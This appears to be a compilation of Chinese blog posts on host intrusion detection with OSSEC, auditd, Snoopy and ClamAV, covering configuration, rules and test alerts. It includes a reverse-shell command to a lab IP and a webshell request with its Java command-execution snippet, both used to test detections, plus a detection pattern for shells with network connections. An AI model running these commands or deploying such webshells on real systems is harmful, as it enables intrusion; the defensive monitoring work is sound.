      level: 5

  timestamp: 1499415795

location_id: 5

     src_ip: 192.168.192.120

     dst_ip: (null)

   src_port: 0

   dst_port: 0

    alertid: 1499415795.28052

       user: root

   full_log: Jul  7 16:23:14 localhost sshd[1589]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.192.120  user=root

  is_hidden: 0

        tld:

         id: 5

  server_id: 1

       name: (192.168.192.196) any->/var/log/secure

*************************** 2. row ***************************

         id: 10

  server_id: 1

    rule_id: 5716

      level: 5

  timestamp: 1499415800

location_id: 5

     src_ip: 192.168.192.120

     dst_ip: (null)

   src_port: 0

   dst_port: 0

    alertid: 1499415797.28415

       user: root

   full_log: Jul  7 16:23:16 localhost sshd[1589]: Failed password for root from 192.168.192.120 port 47519 ssh2

  is_hidden: 0

        tld:

         id: 5

  server_id: 1

       name: (192.168.192.196) any->/var/log/secure

2 rows in set (0.00 sec)

WebUI安装

安装步骤如下:

1)yum -y install gcc gcc-c++ apr-devel apr-util-devel pcre pcre-devel openssl openssl-devel

2)安装apr(version >= 1.4+  )

# wget http://mirrors.tuna.tsinghua.edu.cn/apache/apr/apr-1.5.2.tar.gz

# tar zxf apr-1.5.2.tar.gz

# cd apr-1.5.2

# ./configure --prefix=/usr/local/apr

# make && make install

3)安装apr-util(version >= 1.4+ )

# wget http://mirrors.tuna.tsinghua.edu.cn/apache/apr/apr-util-1.5.4.tar.gz

# tar zxf apr-util-1.5.4.tar.gz

# cd apr-util-1.5.4

# ./configure --prefix=/usr/local/apr-util --with-apr=/usr/local/apr

# make && make install

4)安装httpd-2.4.27

# cd httpd-2.4.27

# ./configure --prefix=/usr/local/apache --with-apr=/usr/local/apr --with-apr-util=/usr/local/apr-util --enable-dav --enable-so --enable-maintainer-mod --enable-rewrite

# make && make install
[root@localhost tmp]# wget https://github.com/ossec/ossec-wui/archive/0.9.tar.gz

[root@localhost tmp]# tar zxvf ossec-wui-0.9.tar.gz

[root@localhost tmp]# mv ossec-wui-0.9 /var/www/html/ossec-wui

[root@localhost tmp]# cd /var/www/html/ossec-wui

[root@localhost ossec-wui]# ./setup.sh

Setting up ossec ui...



Username: vincent

New password:

Re-type new password:

Adding password for user vincent

Enter your web server user name (e.g. apache, www, nobody, www-data, ...)

apache

You must restart your web server after this setup is done.



Setup completed successfully.

[root@localhost ossec-wui]# service httpd start

 

0x05 监控扩展


综合上述OSSEC的一些功能点,我们可以扩展一些其他的监控进来,通过OSSEC告警。这里我举几个例子:

1)存在连接的Bash进程

通常情况下Bash进程是不会存在连接状态的,其父进程SSHD存在网络连接,如下:

[root@sec248 cron.daily]# ps -ef | grep bash | grep -v grep

root     41011 41009  0 08:42 pts/4    00:00:00 -bash

root     45984 45982  0 Dec21 pts/1    00:00:00 -bash

[root@sec248 cron.daily]# netstat -antlp | grep sshd | grep EST

tcp        0     64 10.59.0.248:22              192.168.190.201:52947       ESTABLISHED 41009/sshd         

tcp        0      0 10.59.0.248:22              192.168.190.201:2164        ESTABLISHED 45982/sshd

而反弹shell时,反弹命令bash -i >& /dev/tcp/192.168.192.144/2345 0>&1,我们看一下反弹连接

[root@server120 ~]# netstat -antlp | grep bash

tcp        0      0 192.168.192.120:34710       192.168.192.144:2345        ESTABLISHED 15497/bash

可以看到存在Bash连接,那么我们添加OSSEC的监控项

  <localfile>

    <log_format>full_command</log_format>

    <command>netstat -antlp | grep ESTABLISHED | egrep '/(bash|sh)'</command>

  </localfile>

2)ssdeep检测webshell

【企业安全实战】infotify实现webshell监控部署实践

3)Auditd监控Web中间件

【企业安全实战】Web中间件EXECVE审计

4)ClamAV查杀部署

Linux下部署CLamAV并结合OSSEC告警

0x01 概述


企业安全建设中非常重要的一项工作就是入侵感知体系建设,不同于网络层的安全防护检测如WAF、IPS、IDS等,入侵感知体系更偏向于被入侵后的异常行为发现,即你的机器已经被黑掉的,你能否第一时间发现并且定位到哪里出了问题。Web中间件的系统命令调用监控是我认为入侵感知中性价比较高的一项监控措施,当然你也可以算作HIDS的一项功能。

举个例子,记得S2-045爆出来的时候,公司的不少站点都受到了影响,即便当时安全、运维和开发的响应速度够快,排查受影响的项目替换Jar包,但是还是有部分机器受到了影响,通过这项监控我可以清楚的定位到哪些机器已经被黑了,攻击者执行了什么,心里有底,不至于盲目的去查找。

我目前在用的是通过Linux系统自带的Auditd服务来监控的系统的EXECVE调用,联动OSSEC报警。另外使用开源工具Snoopy可以,我们之前也提到过Bash命令审计,也见到过有的公司运维就是直接用的Snoopy来做的审计,不过我看了下老外的评论有说到可能会影响到系统的稳定性,暂时没有在生产环境测试。

下面我们就详细说一下Auditd和Snoopy这两项监控方式。

 

0x02 Auditd


auditd服务是Linux自带的审计系统,用来记录审计信息,从安全的角度可以用于对系统安全事件的监控。

auditd服务的配置文件位于/etc/audit/audit.rules,其中每个规则和观察器必须单独在一行中。语法如下:

-a <list>,<action> <options>

<list>配置如下:

task

每个任务的列表。只有当创建任务时才使用。只有在创建时就已知的字段(比如UID)才可以用在这个列表中。

entry

系统调用条目列表。当进入系统调用确定是否应创建审计时使用。

exit

系统调用退出列表。当退出系统调用以确定是否应创建审计时使用。

user

用户消息过滤器列表。内核在将用户空间事件传递给审计守护进程之前使用这个列表过滤用户空间事件。有效的字段只有uid、auid、gid和pid。

exclude

事件类型排除过滤器列表。用于过滤管理员不想看到的事件。用msgtype字段指定您不想记录到日志中的消息。

<action>配置如下:

never

不生成审计记录。

always

分配审计上下文,总是把它填充在系统调用条目中,总是在系统调用退出时写一个审计记录。如果程序使用了这个系统调用,则开始一个审计记录。

<options>配置如下:

-S <syscall>

根据名称或数字指定一个系统。要指定所有系统调用,可使用all作为系统调用名称。

-F <name[=,!=,<,>,<=]value>

指定一个规则字段。如果为一个规则指定了多个字段,则只有所有字段都为真才能启动一个审计记录。每个规则都必须用-F启动,最多可以指定64个规则。

常用的字段如下:

pid

进程ID。

ppid

父进程的进程ID。

uid

用户ID。

gid

组ID。

msgtype

消息类型号。只应用在排除过滤器列表上。

arch

系统调用的处理器体系结构。指定精确的体系结构,比如i686(可以通过uname -m命令检索)或者指定b32来使用32位系统调用表,或指定b64来使用64位系统调用表。

...

下面我们编写测试Java命令监控规则

Jboss的启动账户为nobody,添加审计规则

# grep '\-a' /etc/audit/audit.rules

-a exclude,always -F msgtype=CONFIG_CHANGE

-a exit,always -F arch=b32 -F uid=99 -S execve -k webshell

重启服务

# service auditd restart

Stopping auditd:                                           [  OK  ]

Starting auditd:                                           [  OK  ]

使用菜刀马测试:

菜刀马传递的参数为

tom=M&z0=GB2312&z1=-c/bin/sh&z2=cd /;whoami;echo [S];pwd;echo [E]

所执行的程序如下:

else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);

审计日志如下:

type=EXECVE msg=audit(1500273887.809:7496): argc=3 a0="/bin/sh" a1="-c" a2=6364202F7765622F7072.....

然后对照着日志时间戳去找对应的Nginx Access Log中的请求即可定位到webshell。

这里我们添加的规则是针对uid=99的nobody账户,而针对一些环境jboss的启动账户和运维的操作账户相同的情况,可以针对ppid来监控。

 

0x03 snoopy


项目地址:https://github.com/a2o/snoopy

安装步骤如下:

rm -f snoopy-install.sh &&

wget -O snoopy-install.sh https://github.com/a2o/snoopy/raw/install/doc/install/bin/snoopy-install.sh &&

chmod 755 snoopy-install.sh &&

./snoopy-install.sh stable

输出日志:

SNOOPY INSTALL: Starting installation, log file: /tmp/snoopy-install.log

SNOOPY INSTALL: Installation mode: package-latest-stable

SNOOPY INSTALL: Getting latest Snoopy version... got it, 2.4.6

SNOOPY INSTALL: Downloading from http://source.a2o.si/download/snoopy/snoopy-2.4.6.tar.gz... done.

SNOOPY INSTALL: Unpacking ./snoopy-2.4.6.tar.gz... done.

SNOOPY INSTALL: Configuring... done.

SNOOPY INSTALL: Building... done.

SNOOPY INSTALL: Installing... done.

SNOOPY INSTALL: Enabling... done.



SNOOPY LOGGER is now installed and enabled.



TIP #1: If Snoopy is to be enabled for all processes, you need

        to restart your system, or at least all services on it.

// 如果想要Snoopy作用于所有进程,那么需要重启服务器

TIP #2: If you ever need to disable Snoopy, you should use provided

        'snoopy-disable' script. Use 'snoopy-enable' to reenable it.

// 可以snoopy-disable来关掉监控,使用snoopy-enable来开启监控

TIP #3: Snoopy output can usually be found somewhere in /var/log/*

        Check your syslog configuration for details.:

// Snoopy的日志文件位于/var/log/*

TIP #4: Configuration file location: /etc/snoopy.ini

        See included comments for additional configuration options.

// 配置文件/etc/snoopy.ini

Snoopy wishes you a happy logging experience:)

安装完成后会在/usr/local/lib目录下创建libsnoopy.so文件

[root@template log]# ls -alt /usr/local/lib | head -n 10

总用量 8512

drwxr-xr-x.  5 root root    4096 6月   4 11:22 .

-rwxr-xr-x.  1 root root     959 6月   4 11:22 libsnoopy.la

lrwxrwxrwx.  1 root root      18 6月   4 11:22 libsnoopy.so -> libsnoopy.so.0.0.0

lrwxrwxrwx.  1 root root      18 6月   4 11:22 libsnoopy.so.0 -> libsnoopy.so.0.0.0

-rwxr-xr-x.  1 root root  218012 6月   4 11:22 libsnoopy.so.0.0.0

并在/etc/ld.so.preload里加入/usr/local/lib/libsnoopy.so

[root@template log]# cat /etc/ld.so.preload

/usr/local/lib/libsnoopy.so

默认会输出在/var/log/secure

[root@template ~]# tail -n 1 /var/log/secure

Jun  4 16:48:04 template snoopy[2024]: [uid:0 sid:1499 tty:/dev/pts/1 cwd:/root filename:/usr/bin/tail]: tail -n 1 /var/log/secure

执行snoopy-disable

[root@template ~]# snoopy-disable

SNOOPY: Removing from /etc/ld.so.preload: /usr/local/lib/libsnoopy.so

SNOOPY: Disabled.

SNOOPY: Hint: Your system needs to be restarted to finish Snoopy cleanup.

执行snoopy-enable

[root@template ~]# snoopy-enable

SNOOPY: Adding to /etc/ld.so.preload:     /usr/local/lib/libsnoopy.so

SNOOPY: Hint #1: Reboot your machine to load Snoopy system-wide.

SNOOPY: Hint #2: Check your log files for output.

SNOOPY: Enabled.

我们来看下/etc/snoopy.ini中的配置项,日志格式可以自己定义,默认的日志格式如下

; Default value:

;   "[uid:%{uid} sid:%{sid} tty:%{tty} cwd:%{cwd} filename:%{filename}]: %{cmdline}"

可以定制一些过滤条件,例如

; List of available filters:

; - exclude_spawns_of   ; (available=yes) Exclude log entries that occur in specified process trees

; - exclude_uid         ; (available=yes) Exclude these UIDs from logging

; - only_root           ; (available=yes) Only log root commands

; - only_tty            ; (available=yes) Only log commands associated with a TTY

; - only_uid            ; (available=yes) Only log commands executed by these UIDs

可以指定Syslog的Facility

; Default value:

;   LOG_AUTHPRIV

可以指定Syslog的Level

; Default value:

;   LOG_INFO

这里我们测试一下,修改/etc/snoopy.ini配置:

syslog_facility = LOG_LOCAL6

在/etc/rsyslog.conf添加一条配置

local6.info                                             /tmp/snoopy.log

重启rsyslog服务

[root@template ~]# service rsyslog restart

然后我们看下输出

[root@template ~]# tail -n 1 /tmp/snoopy.log

Jun  4 17:00:30 template snoopy[2141]: [uid:0 sid:2068 tty:/dev/pts/2 cwd:/root filename:/usr/bin/tail]: tail -n 1 /tmp/snoopy.log

同样也可以修改rsyslog的配置输出到日志中心。

 

0x04 OSSEC告警配置


这里我使用的是OSSEC监控/var/log/audit/audit.log日志

OSSEC本身已经包含了auditd事件的解码规则,例如:

<decoder name="auditd">

  <prematch>^type=</prematch>

</decoder>

.......

但是在RULES里面没有找到现成的规则,编辑local_rules.xml,新增

<group name="syslog,auditd,">

  <rule id="110000" level="0" noalert="1">

    <decoded_as>auditd</decoded_as>

    <description>AUDITD messages grouped.</description>

  </rule>

  <rule id="110001" level="10">

    <if_sid>110000</if_sid>

    <match>EXECVE</match>

    <description>Java execution command</description>

  </rule>

</group>

测试

[root@localhost ossec]# ./bin/ossec-logtest

2017/07/17 16:28:26 ossec-testrule: INFO: Reading local decoder file.

2017/07/17 16:28:26 ossec-testrule: INFO: Started (pid: 9463).

ossec-testrule: Type one log per line.



type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"





**Phase 1: Completed pre-decoding.

       full event: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'

       hostname: 'localhost'

       program_name: '(null)'

       log: 'type=EXECVE msg=audit(1500273958.180:7500): argc=1 a0="whoami"'



**Phase 2: Completed decoding.

       decoder: 'auditd'



**Phase 3: Completed filtering (rules).

       Rule id: '110001'

       Level: '10'

       Description: 'Java execution command'

**Alert to be generated.

然后在Agent端添加监控文件

  <localfile>

    <log_format>syslog</log_format>

    <location>/var/log/audit/audit.log</location>

  </localfile>

然后jspspy执行系统命令,可以看到告警如下

[root@localhost ossec]# tail -f /var/ossec/logs/alerts/alerts.log

** Alert 1500280231.400419: mail  - syslog,auditd,

2017 Jul 17 16:30:31 (agent-31) 10.110.1.31->/var/log/audit/audit.log

Rule: 110001 (level 10) -> 'Java execution command'

type=EXECVE msg=audit(1500280229.507:7665): argc=1 a0="pwd"

这里还需考虑的一个问题是白名单,例如公司的一些站点本身就会调用视频处理的一些功能,也会调用系统命令。所以为了避免误报,需要新增一个白名单功能。

这里我们修改一下local_rules.xml,新增白名单规则,并且放到EXECVE规则上面。

<group name="syslog,auditd,">

  <rule id="110000" level="0" noalert="1">

    <decoded_as>auditd</decoded_as>

    <description>AUDITD messages grouped.</description>

  </rule>

  <rule id="110001" level="0">

    <if_sid>110000</if_sid>

    <regex>whoami|passwd</regex>

    <description>Java execution white list</description>

  </rule>

  <rule id="110002" level="10">

    <if_sid>110000</if_sid>

    <match>EXECVE</match>

    <description>Java execution command</description>

  </rule>

</group>

如上所示,执行whoami和cat /etc/passwd的时候不会产生告警。

 

[root@server120 local]# yum install gcc openssl openssl-devel pcre pcre-devel clamav clamd -y

安装完成后,需要升级病毒库。
升级程序为/usr/bin/freshclam。
默认的配置文件为/etc/freshclam.conf,内容如下

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
/var/lib/clamav #病毒库的位置
UpdateLogFile /var/log/clamav/freshclam.log
LogSyslog yes
DatabaseOwner clam
DatabaseMirror db.local.clamav.net #病毒同步的请求地址
DatabaseMirror db.local.clamav.net #病毒同步的请求地址

这里修改一下配置文件:

[root@localhost ossec]# grep -v '^$' /etc/freshclam.conf | grep -v '^#'
DatabaseDirectory /var/lib/clamav
UpdateLogFile /var/log/clamav/freshclam.log
DatabaseOwner clam
DatabaseMirror db.cn.clamav.net
DatabaseMirror db.local.clamav.net

然后更新一下病毒库

[root@localhost ossec]# /usr/bin/freshclam
[root@localhost clamav]# ll /var/lib/clamav/
total 341836
-rw-r--r-- 1 clam clam 693248 Jul 14 10:20 bytecode.cld
-rw-r--r-- 1 clam clam 41839208 Jul 14 10:20 daily.cvd
-rw-r--r-- 1 clam clam 307499008 Jul 14 10:03 main.cld
-rw------- 1 clam clam 156 Jul 14 10:22 mirrors.dat

其中daily.cld与daily.cvd相同,只不过daily.cvd是个压缩文件,而daily.cld不是。
freshclam会判断自从上一次检测后是否有新的更新,如果有则会下载diff文件,如果下载diff文件,则会下载一个最新的daily.cvd。

Clamav会添加一个每天执行的定时任务/etc/cron.daily/freshclam,每天更新病毒库文件。

LOG_FILE="/tmp/freshclam.log"
if [ ! -f "$LOG_FILE" ]; then
    touch "$LOG_FILE"
    chmod 644 "$LOG_FILE"
    chown clam.clam "$LOG_FILE"
fi

/usr/bin/freshclam \
    --quiet \
    --datadir="/var/lib/clamav" \
    --log="$LOG_FILE"

 

病毒库更新完成后,执行扫描任务。
这里的想法是OSSEC本身已经有了clamav扫描结果的解码和rule文件
etc/decoder.xml如下:

<decoder name="clamd">
  <program_name>^clamd</program_name>
</decoder>

<decoder name="freshclam">
  <program_name>^freshclam</program_name>
</decoder>

rules/clam_av_rules.xml如下:

  <rule id="52502" level="8">
    <if_sid>52500</if_sid>
    <match>FOUND</match>
    <description>Virus detected</description>
    <group>virus</group>
  </rule>

通过decoder可以看到这里匹配的是Syslog头中的程序为clamd,也就是必须是syslog格式才能解析告警,而默认的-l参数输出非syslog格式,如下测试:
test目录下包含了一些测试的样本文件,我拷贝之前应急拿的一个文件放到了/tmp下

[root@localhost ossec]# /usr/bin/clamscan -i -r /tmp/ -l /var/log/clamav.log
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

查看/var/log/clamav.log,可以看到非Syslog格式

[root@localhost ossec]# cat /var/log/clamav.log

-------------------------------------------------------------------------------

/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 6300501
Engine version: 0.99.2
Scanned directories: 221
Scanned files: 95
Infected files: 1
Data scanned: 2.79 MB
Data read: 2.62 MB (ratio 1.06:1)
Time: 11.918 sec (0 m 11 s)

通过查看/etc/clamd.conf可以看到里面有参数LogSyslog

[root@localhost ossec]# cat /etc/clamd.conf | grep LogSys
LogSyslog yes

可以配置开启syslog,默认输出到local6,但是测试发现这个配置文件不是默认加载的,写进去的配置无法生效,所以这里用logger来输出syslog。
修改一下rsyslog的配置

*.info;mail.none;authpriv.none;cron.none;local6.none /var/log/messages #添加local6.none
local6.notice /var/log/clamav.log

[root@localhost ossec]# service rsyslog restart
[root@localhost ossec]# /usr/bin/clamscan --infected -r /tmp -i | logger -it clamd -p local6.notice
[root@localhost ossec]# cat /var/log/clamav.log 
Jul 14 11:22:45 localhost clamd[1723]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
Jul 14 11:22:45 localhost clamd[1723]: 
Jul 14 11:22:45 localhost clamd[1723]: ----------- SCAN SUMMARY -----------
Jul 14 11:22:45 localhost clamd[1723]: Known viruses: 6300501
Jul 14 11:22:45 localhost clamd[1723]: Engine version: 0.99.2
Jul 14 11:22:45 localhost clamd[1723]: Scanned directories: 221
Jul 14 11:22:45 localhost clamd[1723]: Scanned files: 95
Jul 14 11:22:45 localhost clamd[1723]: Infected files: 1
Jul 14 11:22:45 localhost clamd[1723]: Data scanned: 2.79 MB
Jul 14 11:22:45 localhost clamd[1723]: Data read: 2.62 MB (ratio 1.06:1)
Jul 14 11:22:45 localhost clamd[1723]: Time: 11.950 sec (0 m 11 s)

这里我们用OSSEC监控一下这个文件,添加配置

  <localfile>
    <log_format>syslog</log_format>
    <location>/var/log/clamav.log</location>
  </localfile>

[root@localhost ossec]# /var/ossec/bin/ossec-control restart

可以看到产生的告警如下:

[root@localhost ossec]# tail -n 5 /var/ossec/logs/alerts/alerts.log 
** Alert 1500002954.2336: mail - clamd,freshclam,virus
2017 Jul 14 11:29:14 (192.168.192.1953) any->/var/log/clamav.log
Rule: 52502 (level 8) -> 'Virus detected'
Jul 14 11:29:14 localhost clamd[2077]: /tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

这里另外需要考虑四个问题
1)如何添加病毒库白名单
在病毒库所在目录创建文件:whitelist-signatures.ign2
以脏牛为例,添加内容:Unix.Exploit.CVE_2016_5195-2

2)文件软链问题,是否会重复扫描。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -h
--follow-dir-symlinks[=0/1(*)/2] Follow directory symlinks (0 = never, 1 = direct, 2 = always)
--follow-file-symlinks[=0/1(*)/2] Follow file symlinks (0 = never, 1 = direct, 2 = always)

0表示不检测软链;1表示需要向clamscan传递参数指定文件;2表示检测软链。默认值为1。
这里创建软链测试一下

[root@server120 tmp]# ln -s /tmp/makeudp /tmp/makeudp1 

当指定follow-file-symlinks=0时,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=0 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,不传递参数,软链文件没有扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp 
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=1时,传递参数/tmp/makeudp,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=1 -r /tmp /tmp/makeudp
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

当指定follow-file-symlinks=2时,软链文件可以扫出。

[root@server120 tmp]# /usr/local/clamav/bin/clamscan -i --follow-file-symlinks=2 -r /tmp 
/tmp/makeudp1: Unix.Trojan.Agent-37008 FOUND
/tmp/makeudp: Unix.Trojan.Agent-37008 FOUND

所以默认就不会扫描软链文件。
3)很多机器都挂载了存储,需要排除存储目录。
可以通过–exclude-dir=”^/sys”来排除掉。
10和192开头的挂载排除掉,如下所示:

df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'

4)因为是定时任务每天凌晨执行,如果扫描到了存储设备,很有可能一天扫描不完,需要做判断,如果扫描任务还存在则不扫描;另外针对这种扫描时间超长的事件也需要告警出来,所以需要新增ossec的检测规则扫描时间超过6小时告警。
rules/clam_av_rules.xml新增:

  <rule id="52510" level="7">
      <if_sid>52500</if_sid>
      <match>Time: </match>      
      <regex>\(\d\d\d\d |\(4\d\d |\(5\d\d |\(6\d\d |\(7\d\d |\(8\d\d |\(9\d\d |\(36\d |\(37\d |\(38\d |\(39\d </regex>
      <description>ClamAV scan time over 6hours</description>
  </rule>

PS:这里的正则写成\d{4}不行,[1-9]也不行,无法匹配到
然后测试一下OSSEC告警:

Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)


**Phase 1: Completed pre-decoding.
       full event: 'Jul 14 11:29:15 localhost clamd[2077]: Time: 11.888 sec (360 m 11 s)'
       hostname: 'localhost'
       program_name: 'clamd'
       log: 'Time: 11.888 sec (360 m 11 s)'

**Phase 2: Completed decoding.
       decoder: 'clamd'

**Phase 3: Completed filtering (rules).
       Rule id: '52510'
       Level: '7'
       Description: 'ClamAV scan time over 6hours'
**Alert to be generated.

 

最终执行的定时任务脚本如下:

#!/bin/bash

WHITEDIR="^/proc/|^/sys/|^/data|^/test|/upload"
ps axu | grep clamscan | grep -v grep > /dev/null
if [[ $? == 0 ]]; then
       exit
fi
NFSDIR=`df -h | egrep '(^10\.|^192\.)' | awk '{print $6}' | sed 's/^/^/' | xargs | sed 's/ /|/g'`

if [[ -n $NFS ]]; then
        WHITEDIR="${WHITEDIR}|${NFSDIR}"
fi
COMMAND="/usr/bin/clamscan  -i --exclude-dir='${WHITEDIR}' -r / | logger -it clamd  -p local6.notice"

if [ -f "/usr/bin/clamscan" ];then
        eval $COMMAND &
fi

 

OSSEC是一款开源的多平台的入侵检测系统,可以运行于Windows, Linux, OpenBSD/FreeBSD, 以及 MacOS等操作系统中。包括了日志分析,全面检测,root-kit检测。

1. 测试和验证OSSEC泛化及告警规则

OSSEC默认具有一个ossec-logtest工具用于测试OSSEC的泛化及告警规则。该工具一般默认安装于目录 /var/ossec/bin 中。

使用示例:

 

/var/ossec/bin/ossec-logtest
2014/06/1113:15:36 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:15:36 ossec-testrule: INFO: Started (pid: 26740).
ossec-testrule: Type one log per line.
Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2

**Phase 1: Completed pre-decoding.
full event: 'Jun 10 21:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for root from 172.16.24.121 port 38720 ssh2'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Accepted publickey for root from 172.16.24.121 port 38720 ssh2'

**Phase 2: Completed decoding.
decoder: 'sshd'
dstuser: 'root'
srcip: '172.16.24.121'

**Phase 3: Completed filtering (rules).
Rule id: '10100'
Level: '4'
Description: 'First time user logged in.'
**Alert to be generated.

如上文所示,当输入日志内容:

Jun 1021:29:33 172.16.25.122/172.16.24.32 sshd[24668]: Accepted publickey for rootfrom 172.16.24.121 port 38720 ssh2

该条日志经过三步处理,生成了一条4级告警,规则ID为10100,内容为“First time user logged in.”

使用ossec-logtest-v命令,可获取更详细的日志分析逻辑。

/var/ossec/bin/ossec-logtest -v
2014/06/11 13:44:52 ossec-testrule: INFO: Reading local decoder file.
2014/06/11 13:44:52 ossec-testrule: INFO: Started (pid: 27091).
ossec-testrule: Type one log per line.

Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 21:44:41 172.16.25.122/172.16.24.32 sshd[27743]: Did not receive identification string from 172.16.24.121'
hostname: '172.16.25.122/172.16.24.32'
program_name: 'sshd'
log: 'Did not receive identification string from 172.16.24.121'

**Phase 2: Completed decoding.
decoder: 'sshd'
srcip: '172.16.24.121'

**Rule debugging:
Trying rule: 1 - Generic template for all syslog rules.
*Rule 1 matched.
*Trying child rules.
Trying rule: 5500 - Grouping of the pam_unix rules.
Trying rule: 5700 - SSHD messages grouped.
*Rule 5700 matched.
*Trying child rules.
Trying rule: 5709 - Useless SSHD message without an user/ip and context.
Trying rule: 5711 - Useless/Duplicated SSHD message without a user/ip.
Trying rule: 5721 - System disconnected from sshd.
Trying rule: 5722 - ssh connection closed.
Trying rule: 5723 - SSHD key error.
Trying rule: 5724 - SSHD key error.
Trying rule: 5725 - Host ungracefully disconnected.
Trying rule: 5727 - Attempt to start sshd when something already bound to the port.
Trying rule: 5729 - Debug message.
Trying rule: 5732 - Possible port forwarding failure.
Trying rule: 5733 - User entered incorrect password.
Trying rule: 5734 - sshd could not load one or more host keys.
Trying rule: 5735 - Failed write due to one host disappearing.
Trying rule: 5736 - Connection reset or aborted.
Trying rule: 5707 - OpenSSH challenge-response exploit.
Trying rule: 5701 - Possible attack on the ssh server (or version gathering).
Trying rule: 5706 - SSH insecure connection attempt (scan).
*Rule 5706 matched.

**Phase 3: Completed filtering (rules).
Rule id: '5706'
Level: '6'
Description: 'SSH insecure connection attempt (scan).'
**Alert to be generated.

2. 自定义日志泛化规则
2.1 添加日志源

添加日志源的方式很简单,通过修改/var/ossec/etc/ossec.conf 即可实现。

如果日志源是本地文件,可通过添加如下配置实现。

<localfile>
  <log_format>syslog</log_format>
  <location>/path/to/log/file</location>
</localfile>

如果日志源是远程syslog,可通过添加如下配置实现。

<remote>
<connection>syslog</connection>
<protocol>udp</protocol>
<port>2514</port>
<allowed-ips>172.16.24.0/24</allowed-ips>
</remote>

2.2 创建自定义的日志泛化规则

假如有两条日志如下文:

Jun 11 22:06:30172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat loginSUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .
Jun 11 22:06:30172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login PWD_ERRORfrom 172.17.153.36 to 172.17.153.38 distport 3333 .

该日志使用ossec-logtest分析之后结果如下:

Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .



**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.16.25.130/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
No decoder matched.

由此可知OSSEC在分析日志的时候,经过了两个泛化过程:pre-decoding和 decoding。

pre-decoding过程是ossec内置的,只要是标准的syslog日志,都可以解析出如下4个基本信息。

Timestamp:Jun 11 22:06:30

Hostname: 172.17.153.38/172.16.24.32

Programe_name: /usr/bin/auditServerd

Log: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333.

在decoding过程,用户可以通过修改/var/ossec/etc/decoder.xml,实现自定义的泛化。例如在该文件中添加如下规则:

<decoder name="auditServerd">
  <program_name>/usr/bin/auditServerd</program_name>
</decoder>

再次执行/var/ossec/bin/ossec-logtest

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32 /usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38 distport 3333 .'

**Phase 2: Completed decoding.
decoder: 'auditServerd'

发现,该条日志成功命中了名为auditServerd的规则,该条规则可以准确的将日志定位为是程序auditServerd所发出的。

除此之外,基于auditServerd这条规则,我们还可以添加更多的子规则,来识别出更多的信息。如:

<decoder name="auditServerd">                               
  <program_name>/usr/bin/auditServerd</program_name>                        
</decoder>                                                                                                                                                                                                                                       
<decoder name="auditServerd-login">                                      
  <parent>auditServerd</parent>                           
  <regex offset="after_parent">^User (\S+) login (\S+) from (\S+) to (\S+) distport (\S+) \.$</regex>  
  <order>user,status,srcip,dstip,dstport</order>                                
</decoder>

再次执行/var/ossec/bin/ossec-logtest,可获取更多的信息,如下:

**Phase 1: Completed pre-decoding.
full event: 'Jun 11 22:06:30 172.17.153.38/172.16.24.32/usr/bin/auditServerd[25649]: User blackrat login SUCEESS from 172.17.153.36 to172.17.153.38 distport 3333 .'
hostname: '172.17.153.38/172.16.24.32'
program_name: '/usr/bin/auditServerd'
log: 'User blackrat login SUCEESS from 172.17.153.36 to 172.17.153.38distport 3333 .'

